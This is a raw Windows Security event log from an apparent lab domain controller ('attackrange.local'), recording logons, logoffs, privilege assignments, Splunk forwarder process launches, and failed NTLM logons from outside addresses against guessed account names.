Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:49:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264992
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x89CAE1
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:49:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264993
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: SAAZDEPUSR
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 176.111.173.250
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:49:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264996
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x89FAC6
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:49:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264995
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x89FAC6
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53891
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:49:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264994
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x89FAC6
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:50:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264997
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a84
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:50:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264999
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1674
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:50:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264998
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1208
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:50:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265000
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x158c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:50:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265001
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xcd4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:50:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265003
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x74c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:50:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265002
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf70
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:50:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265004
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: CBADMIN
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 176.111.173.76
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:50:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265005
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: SRV-SQL
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 176.111.173.76
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:50:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265006
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: SQLSYNC
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 176.111.173.76
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:50:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265009
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8A3577
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:50:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265008
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8A3577
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53904
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:50:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265007
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8A3577
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:51:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265010
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a6c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:51:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265012
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b5c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:51:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265011
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1928
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:51:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265013
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14c4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:51:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265015
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1570
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
